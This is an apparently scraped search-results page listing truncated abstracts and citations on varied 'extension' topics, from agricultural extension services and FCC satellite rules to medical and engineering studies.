Part 73 [ET Docket No. 10--152; FCC 10-194] Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and Reauthorization Act of... and provisions of the Satellite Television Extension and Localism Act of 2010 (STELA). This model will... 11. 75 FR 46885 - Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and... Science.gov (United States) 2010-08-04 ... FEDERAL COMMUNICATIONS COMMISSION 47 CFR Part 73 [ET Docket No. 10-152; FCC 10-133] Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and Reauthorization Act of... Commission proposes to implement provisions of the `Satellite Television Extension and Localism Act of 2010... 12. 75 FR 80354 - Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and... Science.gov (United States) 2010-12-22 ... FEDERAL COMMUNICATIONS COMMISSION 47 CFR Part 73 [ET Docket No. 10-152; FCC 10-194] Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and Reauthorization Act of... through the use of an antenna as required by the Satellite Television Extension and Localism Act of 2010... 13. Four Ways Life Extension will Change Our Relationship with Death. Science.gov (United States) Davis, John K 2016-03-01 Discussions of life extension ethics have focused mainly on whether an extended life would be desirable to have, and on the social consequences of widely available life extension. I want to explore a different range of issues: four ways in which the advent of life extension will change our relationship with death, not only for those who live extended lives, but also for those who cannot or choose not to. Although I believe that, on balance, the reasons in favor of developing life extension outweigh the reasons against doing so (something I won't argue for here), most of these changes probably count as reasons against doing so. First, the advent of life extension will alter the human condition for those who live extended lives, and not merely by postponing death. Second, it will make death worse for those who lack access to life extension, even if those people live just as long as they do now. Third, for those who have access to life extension but prefer to live a normal lifespan because they think that has advantages, the advent of life extension will somewhat reduce some of those advantages, even if they never use life extension. Fourth, refusing life extension turns out to be a form of suicide, and this will force those who have access to life extension but turn it down to choose between an extended life they don't want and a form of suicide they may (probably mistakenly) consider immoral. © 2015 John Wiley & Sons Ltd. 14. Proximal disease extension in patients with limited ulcerative colitis DEFF Research Database (Denmark) Burisch, Johan; Ungaro, Ryan; Vind, Ida 2017-01-01 Background and Aims: Disease extent in ulcerative colitis [UC] is dynamic and can progress over time. Little is known about risk factors for UC extension in the era of biologics. We investigated the risk of UC extension and subsequent risk of surgery in a Danish population-based cohort. Methods......: All incident UC cases in a strictly defined Copenhagen area between 2003 and 2004 were followed prospectively through 2011. Disease extension was defined as patients with limited UC [E1 or E2] at diagnosis having progressed from the initial extent by colonoscopy or surgery to E2 or extensive colitis...... experienced disease extension. Only extent at diagnosis was a clinical predictor for disease extension. The risk of colectomy was increased in former smokers and patients who progressed to extensive colitis. This highlights the need to prevent disease progression in patients with limited UC, and to identify... 15. LANES - LOCAL AREA NETWORK EXTENSIBLE SIMULATOR Science.gov (United States) Gibson, J. 1994-01-01 The Local Area Network Extensible Simulator (LANES) provides a method for simulating the performance of high speed local area network (LAN) technology. LANES was developed as a design and analysis tool for networking on board the Space Station. The load, network, link and physical layers of a layered network architecture are all modeled. LANES models to different lower-layer protocols, the Fiber Distributed Data Interface (FDDI) and the Star*Bus. The load and network layers are included in the model as a means of introducing upper-layer processing delays associated with message transmission; they do not model any particular protocols. FDDI is an American National Standard and an International Organization for Standardization (ISO) draft standard for a 100 megabit-per-second fiber-optic token ring. Specifications for the LANES model of FDDI are taken from the Draft Proposed American National Standard FDDI Token Ring Media Access Control (MAC), document number X3T9.5/83-16 Rev. 10, February 28, 1986. This is a mature document describing the FDDI media-access-control protocol. Star*Bus, also known as the Fiber Optic Demonstration System, is a protocol for a 100 megabit-per-second fiber-optic star-topology LAN. This protocol, along with a hardware prototype, was developed by Sperry Corporation under contract to NASA Goddard Space Flight Center as a candidate LAN protocol for the Space Station. LANES can be used to analyze performance of a networking system based on either FDDI or Star*Bus under a variety of loading conditions. Delays due to upper-layer processing can easily be nullified, allowing analysis of FDDI or Star*Bus as stand-alone protocols. LANES is a parameter-driven simulation; it provides considerable flexibility in specifying both protocol an run-time parameters. Code has been optimized for fast execution and detailed tracing facilities have been included. LANES was written in FORTRAN 77 for implementation on a DEC VAX under VMS 4.6. It consists of two 16. Life extension and life cycle management International Nuclear Information System (INIS) Hoang, H. 2010-10-01 To continue the effort of nuclear energy as the clean energy offsetting the increase in greenhouse gas emission that contributes to the increased global warming effect, the nuclear industry is focused on the optimization of their current nuclear generation assets. Plant life extension (Plex) and Plant life management (Plim), together with power up rate, are the key strategies for the optimization effort. Plex begins with the process to obtain the regulatory approval for an additional 20 years of operation, beyond the current 40-year limit. This highly standardized process consists of the following steps: 1) Scoping: identify the systems, structures and components for inclusion in the license renewal scope of work. 2) Screening: narrow down the selection of the in-scope systems, structures and components based on passive and long-lived characteristics. 3) Aging management review: demonstrate that aging effects will continue to be managed during the additional 20 years of operation. 4) Time limiting aging analyses: confirm the acceptability of design bases analyses that assume the 40-year plant life as a key input assumptions. To provide a consistent approach for the preparation of the license renewal application, the following are the key guidance documents: NUREG-1800: Standard review plan; NUREG-1801: Generic aging lessons learned; Nuclear Energy Institute NEI 95-10. The objectives of Plim are to focus on improving plant reliability/availability, and to plan for equipment upgrades for efficiency improvement as well as technological obsolescence. Plim is a technical evaluation combined with a risk assessment to produce a long-range business plant with a time horizon of 10 years or longer. Due to its long view nature, this plan will be reviewed on a yearly basis for any required adjustments. The technical evaluation consists of the following major steps: 1) Select systems, structures and components with performance deficiencies experience. 2) Collect operating data 17. Biomimetic finger extension mechanism for soft wearable hand rehabilitation devices. Science.gov (United States) Kim, Dong Hyun; Heo, Si-Hwan; Park, Hyung-Soon 2017-07-01 For the rehabilitation and assistance of the hand functions, wearable devices have been developed, and the interest in tendon driven mechanisms have especially increased since it allows light weight and compact design. The tendon driven hand rehabilitation devices provides grasping force via exo-tendons routed on the dorsal and palmar sides of the hand pulled by remotely located actuators. However, most of the devices were not able to provide natural joint extension sequence of the finger and showed hyperextension of finger joints because the tendons for extension were fixed at the fingertip, concentrating the torque at the distal interphalangeal joint. In this study, a ring-type biomimetic finger extension mechanism was developed, which mimics the origin, structure, and orientation of the extensor tendon. The biomimetic mechanism was evaluated by comparing the motion with voluntary finger extension and the motion made by other conventional tendon driven finger extension mechanisms. The biomimetic extension mechanism provided the same joint extension sequence with voluntary finger extension, and the fully extended posture was most close to the voluntary finger extension among the tendon-driven mechanisms used in the experiments. The joint angle differences between the proposed tendon mechanism and the voluntary finger extension was -1.2 °±3.4 °, -2.9°±2.0°, and -3.1°±8.0° for distal phalangeal, proximal phalangeal, and metacarpo-phalangeal joint, respectively. 18. Autolysis and extension of isolated walls from growing cucumber hypocotyls Science.gov (United States) Cosgrove, D. J.; Durachko, D. M. 1994-01-01 Walls isolated from cucumber hypocotyls retain autolytic activities and the ability to extend when placed under the appropriate conditions. To test whether autolysis and extension are related, we treated the walls in various ways to enhance or inhibit long-term wall extension ('creep') and measured autolysis as release of various saccharides from the wall. Except for some non-specific inhibitors of enzymatic activity, we found no correlation between wall extension and wall autolysis. Most notably, autolysis and extension differed strongly in their pH dependence. We also found that exogenous cellulases and pectinases enhanced extension in native walls, but when applied to walls previously inactivated with heat or protease these enzymes caused breakage without sustained extension. In contrast, pretreatment of walls with pectinase or cellulase, followed by boiling in methanol to inactivate the enzymes, resulted in walls with much stronger expansin-mediated extension responses. Crude protein preparations from the digestive tracts of snails enhanced extension of both native and inactivated walls, and these preparations contained expansin-like proteins (assessed by Western blotting). Our results indicate that the extension of isolated cucumber walls does not depend directly on the activity of endogenous wall-bound autolytic enzymes. The results with exogenous enzymes suggest that the hydrolysis of matrix polysaccharides may not induce wall creep by itself, but may act synergistically with expansins to enhance wall extension. 19. Correlation between extension-block K-wire insertion angle and postoperative extension loss in mallet finger fracture. Science.gov (United States) Lee, S K; Kim, Y H; Moon, K H; Choy, W S 2018-02-01 Extension-block pinning represents a simple and reliable surgical technique. Although this procedure is commonly performed successfully, some patients develop postoperative extension loss. To date, the relationship between extension-block Kirschner wire (K-wire) insertion angle and postoperative extension loss in mallet finger fracture remains unclear. We aimed to clarify this relationship and further evaluate how various operative and non-operative factors affect postoperative extension loss after extension-block pinning for mallet finger fracture. A retrospective study was conducted to investigate a relationship between extension block K-wire insertion angle and postoperative extension loss. The inclusion criteria were: (1) a dorsal intra-articular fracture fragment involving 30% of the base of the distal phalanx with or without volar subluxation of the distal phalanx; and (2) K-wire insertion angle and fixation angle of the distal interphalangeal (DIP) joint were assessed using lateral radiograph at immediate postoperative time. Postoperative extension loss was assessed by using lateral radiograph at latest follow-up. Extension-block K-wire insertion angle was defined as the acute angle between extension block K-wire and longitudinal axis of middle phalangeal head. DIP joint fixation angle was defined as the acute angle between the distal phalanx and middle phalanx longitudinal axes. Seventy-five patients were included. The correlation analysis revealed that extension-block K-wire insertion angle had a negative correlation with postoperative extension loss, whereas fracture size and time to operation had a positive correlation (correlation coefficient for extension block K-wire angle: -0.66, facture size: +0.67, time to operation: +0.60). When stratifying patients in terms of negative and positive fixation angle of the DIP joint, the independent t-test showed that mean postoperative extension loss is -3.67° and +4.54° (DIP joint fixation angles of K 20. Proactive life extension of pressure vessels Science.gov (United States) Mager, Lloyd 1998-03-01 place while our vessels are in service. As the inspection takes place we are able to view a real time image of detected discontinuities on a video monitor. The B-scan ultrasonic technique is allowing us to perform fast accurate examinations covering up to 95% of the surface area of each pressure vessel. Receiving data on 95% of a pressure vessel provides us with a lot of useful information. We use this data to determine the condition of each pressure vessel. Once the condition is known the vessels are classed by risk. The risk level is then managed by making decisions related to repair, operating parameters, accepting and monitoring or replacement of the equipment. Inspection schedules are set at maximum intervals and reinspection is minimized for the vessels that are not at risk. The remaining life of each pressure vessel is determined, mechanical integrity is proven and regulatory requirements are met. Abbott Laboratories is taking this proactive approach because we understand that our process equipment is a critical element for successful operation. A run to failure practice would never allow Abbott Laboratories to achieve the corporation's objective of being the world's leading health care company. Nondestructive state of the art technology and the understanding of its capabilities and limitations are key components of a proactive program for life extension of pressure vessels. 26 1. Research on Customer Value Based on Extension Data Mining Science.gov (United States) Chun-Yan, Yang; Wei-Hua, Li Extenics is a new discipline for dealing with contradiction problems with formulize model. Extension data mining (EDM) is a product combining Extenics with data mining. It explores to acquire the knowledge based on extension transformations, which is called extension knowledge (EK), taking advantage of extension methods and data mining technology. EK includes extensible classification knowledge, conductive knowledge and so on. Extension data mining technology (EDMT) is a new data mining technology that mining EK in databases or data warehouse. Customer value (CV) can weigh the essentiality of customer relationship for an enterprise according to an enterprise as a subject of tasting value and customers as objects of tasting value at the same time. CV varies continually. Mining the changing knowledge of CV in databases using EDMT, including quantitative change knowledge and qualitative change knowledge, can provide a foundation for that an enterprise decides the strategy of customer relationship management (CRM). It can also provide a new idea for studying CV. 2. Segment-Specific Adhesion as a Driver of Convergent Extension Science.gov (United States) Vroomans, Renske M. A.; Hogeweg, Paulien; ten Tusscher, Kirsten H. W. J. 2015-01-01 Convergent extension, the simultaneous extension and narrowing of tissues, is a crucial event in the formation of the main body axis during embryonic development. It involves processes on multiple scales: the sub-cellular, cellular and tissue level, which interact via explicit or intrinsic feedback mechanisms. Computational modelling studies play an important role in unravelling the multiscale feedbacks underlying convergent extension. Convergent extension usually operates in tissue which has been patterned or is currently being patterned into distinct domains of gene expression. How such tissue patterns are maintained during the large scale tissue movements of convergent extension has thus far not been investigated. Intriguingly, experimental data indicate that in certain cases these tissue patterns may drive convergent extension rather than requiring safeguarding against convergent extension. Here we use a 2D Cellular Potts Model (CPM) of a tissue prepatterned into segments, to show that convergent extension tends to disrupt this pre-existing segmental pattern. However, when cells preferentially adhere to cells of the same segment type, segment integrity is maintained without any reduction in tissue extension. Strikingly, we demonstrate that this segment-specific adhesion is by itself sufficient to drive convergent extension. Convergent extension is enhanced when we endow our in silico cells with persistence of motion, which in vivo would naturally follow from cytoskeletal dynamics. Finally, we extend our model to confirm the generality of our results. We demonstrate a similar effect of differential adhesion on convergent extension in tissues that can only extend in a single direction (as often occurs due to the inertia of the head region of the embryo), and in tissues prepatterned into a sequence of domains resulting in two opposing adhesive gradients, rather than alternating segments. PMID:25706823 3. On the Rank of Elliptic Curves in Elementary Cubic Extensions Directory of Open Access Journals (Sweden) Rintaro Kozuma 2015-01-01 Full Text Available We give a method for explicitly constructing an elementary cubic extension L over which an elliptic curve ED:y2+Dy=x3  (D∈Q∗ has Mordell-Weil rank of at least a given positive integer by finding a close connection between a 3-isogeny of ED and a generic polynomial for cyclic cubic extensions. In our method, the extension degree [L:Q] often becomes small. 4. A Proposal for Public and Private Partnership in Extension. Science.gov (United States) Krell, Rayda K; Fisher, Marc L; Steffey, Kevin L 2016-01-01 Public funding for Extension in the United States has been decreasing for many years, but farmers' need for robust information on which to make management decisions has not diminished. The current Extension funding challenges provide motivation to explore a different model for developing and delivering extension. The private sector has partnered with the public sector to fund and conduct agricultural research, but partnering on extension delivery has occurred far less frequently. The fundamental academic strength and established Extension network of the public sector combined with the ability of the private sector to encourage and deliver practical, implementable solutions has the potential to provide measurable benefits to farmers. This paper describes the current Extension climate, presents data from a survey about Extension and industry relationships, presents case studies of successful public- and private-sector extension partnerships, and proposes a framework for evaluating the state of effective partnerships. Synergistic public-private extension efforts could ensure that farmers receive the most current and balanced information available to help with their management decisions. 5. An extension for dynamic lot-sizing heuristics Directory of Open Access Journals (Sweden) Fabian G. Beck 2015-01-01 Full Text Available This paper presents an efficient procedure to extend dynamic lot-sizing heuristics that has been overlooked by inventory management literature and practice. Its intention is to show that the extension improves the results of basic heuristics significantly. We first present a comprehensive description of the extension procedure and then test its performance in an extensive numerical study. Our analysis shows that the extension is an efficient tool to improve basic dynamic lot-sizing heuristics. The results of the paper may be used in inventory management to assist researchers in selecting dynamic lot-sizing heuristics and may be of help for practitioners as decision support. 6. Safety design guides for containment extension for CANDU 9 International Nuclear Information System (INIS) Lee, Duk Su; Chang, Woo Hyun; Lee, Nam Young; A. C. D. Wright 1996-03-01 This safety design guide for containment extension describes the containment isolation philosophy and containment extension requirements. The metal extensions and components falling within the scope of ASME Section III are classified in accordance with the CAN/CSA-N285.0 and CAN/CSA-N285.3. The special consideration for the leak monitoring capability, seismic qualification and inspection requirements for containment extensions, etc., are defined in this design guide. In addition, the containment isolation systems are defined and summarized schematically in appendix A. The change status of the regulatory requirements, code and standards should be traced and this safety design guide shall be updated accordingly. (Author) .new 7. An Extension of the Mean Value Theorem for Integrals Science.gov (United States) Khalili, Parviz; Vasiliu, Daniel 2010-01-01 In this note we present an extension of the mean value theorem for integrals. The extension we consider is motivated by an older result (here referred as Corollary 2), which is quite classical for the literature of Mathematical Analysis or Calculus. We also show an interesting application for computing the sum of a harmonic series. 8. 48 CFR 52.211-13 - Time Extensions. Science.gov (United States) 2010-10-01 ... extension may provide that the contract completion date will be extended only for those specific elements...) CLAUSES AND FORMS SOLICITATION PROVISIONS AND CONTRACT CLAUSES Text of Provisions and Clauses 52.211-13...) Time extensions for contract changes will depend upon the extent, if any, by which the changes cause... 9. A Meta-Analysis of Extensive Reading Research Science.gov (United States) Nakanishi, Takayuki 2015-01-01 The purposes of this study were to investigate the overall effectiveness of extensive reading, whether learners' age impacts learning, and whether the length of time second language learners engage in extensive reading influences test scores. The author conducted a meta-analysis to answer research questions and to identify future research… 10. Effect of Personality Types of Extension Personnel on their Job ... African Journals Online (AJOL) ... of extension personnel of 0.411 at 0.01level of significance, with more of the extension personnel with ESFJ (Extroverted feeling with sensing) (29.82%) personality type followed by ISFJ (Introverted sensing with feeling) (19.3%) and ENFJ (Extroverted feeling with intuiting) (12.28), ENFP (Extroverted intuiting with feeling), ... 11. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza Effective engagement of extension in agricultural development requires a change of extension approach ..... is consistent with the assertion made by the Secretariat of the Pacific Community (2010: n. pag.) that, “the .... found in West African countries including projects such as: ICT Support for Agricultural. Literacy in Ghana ... 12. evaluation of job performance of village extension agents in lagos ... African Journals Online (AJOL) AFINNI IMAM Journal of Agricultural Extension. Vol. 13 (2) December 2009. Probit Analysis of Women's Access to Agricultural Inputs in. Bosso Local Government Area, Niger State, Nigeria. Olaleye, R. S , Ibrahim, M. and Ojo, M. A. Dept. of Agric Econs. and Extension Tech. Federal University Of Technology. P.M.B.65, Minna, Niger State. 13. The perception of agricultural extension agents on job motivation in ... African Journals Online (AJOL) This study examined extension agent perception on job motivation in Kwara State, Nigeria. The study engaged the entire 106 agricultural extension agents in Kwara State. Data were analysed using both Descriptive Statistics and Pearson Product Moment Correlation (PPMC). Results showed that the major perceived ... 14. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza There is no one set of challenges that justify privatization of extension and advisory services both in developed and developing areas. It is argued that factors that can influence privatization include; limited budget provisions and ineffectiveness of extension and advisory services. Literature is full of lessons on the failure and ... 15. Journal of Agricultural Extension Vol.17 (2) December, 2013 ISSN ... African Journals Online (AJOL) ONIKOYI 2Department of Agricultural Economics and Extension. Delta State University, Asaba ... overview of the mechanisms through which mobile phone telephony can affect economic development in sub-Saharan Africa ... 3. identify the areas of agricultural extension services/information dissemination supported by mobile phone. 16. Use of Internet for Innovation Management by Extension Agents in ... African Journals Online (AJOL) User Journal of Agricultural Extension. Abstracted by: EBSCOhost, Electronic Journals Service (EJS), ... Internet services and resources, it is essential that extension services and farmers should be enabled to have better ..... among the notable areas include; time-saving, increased efficiency, saves energy, process, and store and ... 17. Treatment strategies for extensive chronic SFA occlusions : indications and results NARCIS (Netherlands) Lensvelt, M. M. A.; Reijnen, M. M. P. J.; De Vries, B. M. Wallis; Zeebregts, C. J. Treatment modalities for extensive chronic occlusive disease of the superficial femoral artery (SFA) have changed during the last decades. In this chapter we provide an overview of current treatment modalities for extensive chronic occlusive disease of the SFA. Although the autologous venous conduit 18. Treatment strategies for extensive chronic SFA occlusions: indications and results. NARCIS (Netherlands) Lensvelt, M.M.A.; Reijnen, M.M.P.J.; Wallis de Vries, B.M.; Zeebregts, C.J.A. 2012-01-01 Treatment modalities for extensive chronic occlusive disease of the superficial femoral artery (SFA) have changed during the last decades. In this chapter we provide an overview of current treatment modalities for extensive chronic occlusive disease of the SFA. Although the autologous venous conduit 19. 12 CFR 215.3 - Extension of credit. Science.gov (United States) 2010-01-01 ... OFFICERS, DIRECTORS, AND PRINCIPAL SHAREHOLDERS OF MEMBER BANKS (REGULATION O) § 215.3 Extension of credit... 12 Banks and Banking 2 2010-01-01 2010-01-01 false Extension of credit. 215.3 Section 215.3 Banks... bank for its own protection for: (i) Accrued interest; or (ii) Taxes, insurance, or other expenses... 20. Perceived Factors Affecting Performance Of Extension Workers In ... African Journals Online (AJOL) The study focused on perceived factors affecting performance of extension workers in Imo State, Nigeria. Data for the study was collected from 83 Extension agents from the Imo State Agricultural Development Programme (ADP). Results of the study revealed that the organizational factors that affect performance are ... 1. Cooperative Extension Answers the Call to Action to Support Breastfeeding Science.gov (United States) Brill, Michelle F. 2016-01-01 Extension has many opportunities to promote breastfeeding, one of the most highly effective preventive measures a mother can take to protect the health of her infant and herself. This article describes how and why Cooperative Extension can and should partner with federal and state efforts to promote breastfeeding. Members of Rutgers' Family and… 2. Arc parallel extension in Higher and Lesser Himalayas, evidence ... extension determined based on geodetically computed extension rate and age of initiation of rifting in southern ..... sive distribution of these extensional structures in the Lesser Himalayas, we analysed incised fluvial terrace deposits. In the eastern Himalaya, the MCT ..... and Duncan C 2006 Climatic forcing of erosion, land-. 3. A Look Inside: Self-Leadership Perceptions of Extension Educators Science.gov (United States) Ricketts, Kristina G.; Carter, Hannah S.; Place, Nick T.; McCoy, Teresa 2012-01-01 Extension educators are often considered influential community leaders. Still the question remains--how do educators motivate themselves to success? Does this contribute towards their self-leadership perceptions? Specialists from three universities administered a survey to look at the "self-leadership" of Extension educators. Results… 4. Extension needs in quail farming in Imo State, Nigeria | Iwuchukwu ... African Journals Online (AJOL) ... to information on how to rear quail” (M= 2.71).The study recommended the need to boost research on quail production so that extension workers, farmers and consumers will appreciate the importance of this livestock and enjoy it”s nutritional and economic benefits. Key words: extension needs quail farming Imo State ... 5. Information Search Behaviors of Indian Farmers: Implications for Extension Services Science.gov (United States) Glendenning, Claire J.; Babu, Suresh C.; Asenso-Okyere, Kwadwo 2012-01-01 Purpose: In India, a national survey conducted in 2003 showed that only 40% of farmers accessed extension. But little is known of the characteristics of farmers who did not access extension. However, this understanding is needed in order to target approaches to farmers, who differ in their access and use of information, that is their information… 6. Analysis of issues related to organizational commitment of extension ... African Journals Online (AJOL) Organizational commitment of extension personnel in Oyo and Ogun States Agricultural Development Programmes was studied. Organizational commitment is the degree to which the organization members identify with the values and goals of their organization. A census of the extension personnel in both OYSADEP (312) ... 7. Extension agents\\' marketing related services: The relevance to ... African Journals Online (AJOL) This study investigated the marketing related services provided to farmers by extension agents in Osun State, Nigeria. Data were collected from the extension agents in the services of Osun State Agricultural Development Projects, which is the government outfit to provide such services to farmers on one hand and their ... 8. Individual and Group Extension Methods: Perspectives from Vi ... African Journals Online (AJOL) Participatory Rural Appraisals (PRAs) tools including semi-structured questionnaires were administrated to 90 randomly selected farmers who had received extension services from the project. In addition, twelve project extension workers were interviewed. Data were analysed using SPSS computer package and descriptive ... 9. 15 CFR 766.16 - Procedural stipulations; extension of time. Science.gov (United States) 2010-01-01 ... 15 Commerce and Foreign Trade 2 2010-01-01 2010-01-01 false Procedural stipulations; extension of... REGULATIONS ADMINISTRATIVE ENFORCEMENT PROCEEDINGS § 766.16 Procedural stipulations; extension of time. (a) Procedural stipulations. Unless otherwise ordered, a written stipulation agreed to by all parties and filed... 10. 15 CFR 280.217 - Procedural stipulations; extension of time. Science.gov (United States) 2010-01-01 ... 15 Commerce and Foreign Trade 1 2010-01-01 2010-01-01 false Procedural stipulations; extension of... ASSESSMENT PROGRAMS FASTENER QUALITY Enforcement § 280.217 Procedural stipulations; extension of time. (a) Procedural stipulations. Unless otherwise ordered, a written stipulation agreed to by all parties and filed... 11. 31 CFR 585.406 - Extensions of credits or loans. Science.gov (United States) 2010-07-01 ... 31 Money and Finance: Treasury 3 2010-07-01 2010-07-01 false Extensions of credits or loans. 585.406 Section 585.406 Money and Finance: Treasury Regulations Relating to Money and Finance (Continued... Interpretations § 585.406 Extensions of credits or loans. (a) The prohibition in § 585.210 applies to the... 12. research and extension processes and practices in relation to ... African Journals Online (AJOL) p2333147 Key Words: Failure “ToT,” research-extension-farmer linkages, alternative paradigm, pro-poor extension ... introduced during the colonial era, failed to provide research and technology outputs that meet smallholder ... In addition, successful smallholder farmer innovations, technologies and dissemination approaches are not ... 13. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza ABSTRACT. This paper describes natural resource factors in order to assist extension service with decision making ... Extension service can also play a key role in agricultural decision-making and planning purposes in a particular area. ..... POOLEY, E., 1998. A Field Guide to Wild Flowers of KwaZulu-Natal and the Eastern. 14. Knowledge Levels of Extension Agents and their Perceived Impact ... African Journals Online (AJOL) This study examined the knowledge levels of extension agents and their perceived impact of climate change on extension service provision in Ghana. Specifically, it examined awareness levels of agents on the causes, effects and methods for mitigating climate change. It also determined their perceived impact of climate on ... 15. Monitoring extensions for component-based distributed software NARCIS (Netherlands) Diakov, N.K.; Papir, Z.; van Sinderen, Marten J.; Quartel, Dick 2000-01-01 This paper defines a generic class of monitoring extensions to component-based distributed enterprise software. Introducing a monitoring extension to a legacy application system can be very costly. In this paper, we identify the minimum support for application monitoring within the generic 16. Extension's Future: Time for Disruptive Innovation Science.gov (United States) Franz, Nancy K.; Cox, Ronald A. 2012-01-01 Extension has been considered change averse by some scholars and practitioners, and they claim this inhibits organizational growth and relevance. Pockets of individuals and teams across the nation have worked independently as entrepreneurs to enhance Extension's relevance by introducing organizational processes and programs that greatly… 17. A business model framework for product life extension NARCIS (Netherlands) Den Hollander, M.C.; Bakker, C.A. 2012-01-01 Product life extension is an increase in the utilization period of products. Design research on product life extension strategies has so far mainly focused on technical aspects of products, like ‘prevention engineering’ or ‘design for repair, maintenance and upgradability’, and on individual 18. Extension systems in Southern African countries: A review | Oladele ... African Journals Online (AJOL) This paper reviews extension systems in selected southern African countries with a view of identifying the features of the systems and how they have been able to reach their target audience. Some of the features are use of committees for research and extension linkages, involvement of NGOs and private sector, the use ... 19. Extensions to the Speech Disorders Classification System (SDCS) Science.gov (United States) Shriberg, Lawrence D.; Fourakis, Marios; Hall, Sheryl D.; Karlsson, Heather B.; Lohmeier, Heather L.; McSweeny, Jane L.; Potter, Nancy L.; Scheer-Cohen, Alison R.; Strand, Edythe A.; Tilkens, Christie M.; Wilson, David L. 2010-01-01 This report describes three extensions to a classification system for paediatric speech sound disorders termed the Speech Disorders Classification System (SDCS). Part I describes a classification extension to the SDCS to differentiate motor speech disorders from speech delay and to differentiate among three sub-types of motor speech disorders.… 20. An ICT-Based Agricultural Extension Service Delivery for Nigeria ... African Journals Online (AJOL) This paper proposed an ICT-based extension service delivery for Nigeria. The proposed design, though to be use as supplement to the existing system would engender an extension delivery system that is void of many of the limitations inherent in the earlier approaches. Basically, it revolves round the use ICT facilities like ... 1. University Extension Reconsidered. Vaughan Papers in Adult Education, II. Science.gov (United States) Pashley, B.W. Based on an unpublished 1950 masters thesis, this paper on university extension in Britain reviews the nineteenth century background at Oxford, Cambridge, Victoria, and other universities, the close of the so-called classical period during 1900-24, the growing institutionalization of university extension during 1924-39, and postwar trends toward… 2. Building the capacity of agricultural extension personnel for effective ... African Journals Online (AJOL) This paper strongly recommends immediate recruitment of new hands as well as full implementation of a well-designed capacity building programme so as to ensure a sustainable extension service delivery system where extension personnel can operate in the expected commercial (agriculture-driven) economy. Keywords: ... 3. Subsystem Design Guidelines for Extensible General-Purpose Software NARCIS (Netherlands) Grefen, P.W.P.J.; Wieringa, Roelf J.; Magee, J.N.; Perry, D.E. 1998-01-01 We discuss subsystem design for extensible general-purpose information systemswe extract guidelines from a case study of the redesign and extension of an advanced workflow management system and place them into the context of existing software engineering research. Key aspect is the distinction 4. Towards designing a new agricultural extension service for the ... African Journals Online (AJOL) Staffing. This paper is aimed at discussing the identified factors, related to organizational and human capital development, that are essential for effective extension and will propose the basis and design framework of an extension model discussed in a later paper. Researchers who are currently undergoing an academic ... 5. Extension Systems in Tanzania: Identifying Gaps in Research African Journals Online (AJOL) The terms extension systems (ES) and agricultural extension systems (AES) in this review paper will be used interchangeably. However, the focus will be on AES defined as an agricultural information exchange system which shows the actors, people and institutions, their interactions and communication networks. 6. Impact of agricultural extension services on adoption of root crops ... African Journals Online (AJOL) Impact of agricultural extension services on adoption of root crops technologies in Ondo State, Nigeria. ... The study therefore recommended that extension organizations should consider a number of factors other than contact with farmers for farmers' adoption of new technologies. These include the arrangement of follow-up ... 7. analysis of selected issues in swaziland's agricultural extension African Journals Online (AJOL) This paper describes the development of agricultural extension in Swaziland with regards to history; organizational philosophy, mission, goals and objectives, implementation delivery system and evaluation; policy framework; funding; linkages between agricultural extension (AE) and research; the planning of AE activities; ... 8. Evaluation of Extension Agents Commitment to the Agricultural ... African Journals Online (AJOL) The study evaluated the activities of Extension agents on Agricultural Loans and Inputs Supply Programme participant farmers' rice output/income. Data were collected with the aid of questionnaire from 60 Extension agents (participating in the ALIS programme) randomly selected from 6 LGAs (where the programme is ... 9. Confidence of Extension Staff in Akwa Ibom State Agricultural ... African Journals Online (AJOL) This study assessed the organizational confidence of extension staff in Akwa Ibom state agricultural development programme (AKADEP). The study also determined the relationships between selected personal characteristics and organizational confidence variables of the extension staff. A sample of ninety (90) randomly ... 10. Threats and surprises behind IPv6 extension headers NARCIS (Netherlands) Hendriks, Luuk; Velan, Petr; de Oliveira Schmidt, Ricardo; De Boer, Pieter Tjerk; Pras, Aiko 2017-01-01 The concept of Extension Headers, newly introduced with IPv6, is elusive and enables new types of threats in the Internet. Simply dropping all traffic containing any Extension Header - a current practice by operators-seemingly is an effective solution, but at the cost of possibly dropping legitimate 11. A comparison of project participants and extension officers ... African Journals Online (AJOL) The study examined the perception of project participants and extension officers regarding marketing of agricultural produce in agricultural projects in the North West Province. The objective of the study was primarily to compare the perceptions of project participants and extension officers. When establishing a project, ... 12. Challenges for extension service to render efficient post-transformer ... African Journals Online (AJOL) LPhidza The study examined the perception and knowledge of project participants and extension officers about production knowledge in agricultural projects. The objective of the study was to compare the perception and knowledge of project participants and extension officers regarding production knowledge in agricultural projects ... 13. The Cleveland Museum of Art: Its Extensions Division. Science.gov (United States) Chakalis, Andrew T. 1987-01-01 Reviews the purposes and programs of the Extensions Division of the Department of Education of a metropolitan museum. Surveys services provided to schools. Gives a sample lesson plan. Highlights thematic exhibitions at the museum. Considers education by means of the art object as the primary goal of the Extensions Division. (CW) 14. University Extension and Urban Planning Programs: An Efficient Partnership. Science.gov (United States) Kotval, Zenia 2003-01-01 The Urban Planning Practicum is a capstone course engaging Michigan State students in urban outreach, working with community organizations on neighborhood revitalization. It facilitates the experiential learning needs of urban planning students while assisting Extension staff in capacity building. Faculty-extension agent partnerships make it… 15. Towards effective extension delivery approach and strategies for ... African Journals Online (AJOL) Towards effective extension delivery approach and strategies for food security poverty alleviation and sustainable development in Nigeria. ... This paper took an overview of extension delivery in the country and implied confusion, duplication and waste of resources. The paper recommends adequate implementation of ... 16. Analysis of the work environment of extension personnel in Benue ... African Journals Online (AJOL) This investigation was undertaken to ascertain the environment in which extension workers transact their legitimate professional duties in Benue and Plateau States. The analyses of the results obtained indicate that extension workers operate in a less satisfying environment to the extent that about 67.3%, 36.9%, 88.2%, ... 17. Affecting Community Change: Involving "Pro Bono" Professionals as Extension Volunteers Science.gov (United States) Kelley, Diane T.; Culp, Ken, III 2013-01-01 "Pro bono" volunteers provide an effective means for Extension professionals to expand limited financial and human resources. Volunteers recruited from business settings can provide skills, abilities, expertise, leadership, and resources to Extension programs. Allowing professional volunteers to meet their desired leadership goals while… 18. Trends and Challenges in Nigerian Extension Education and Research Science.gov (United States) Gombe, 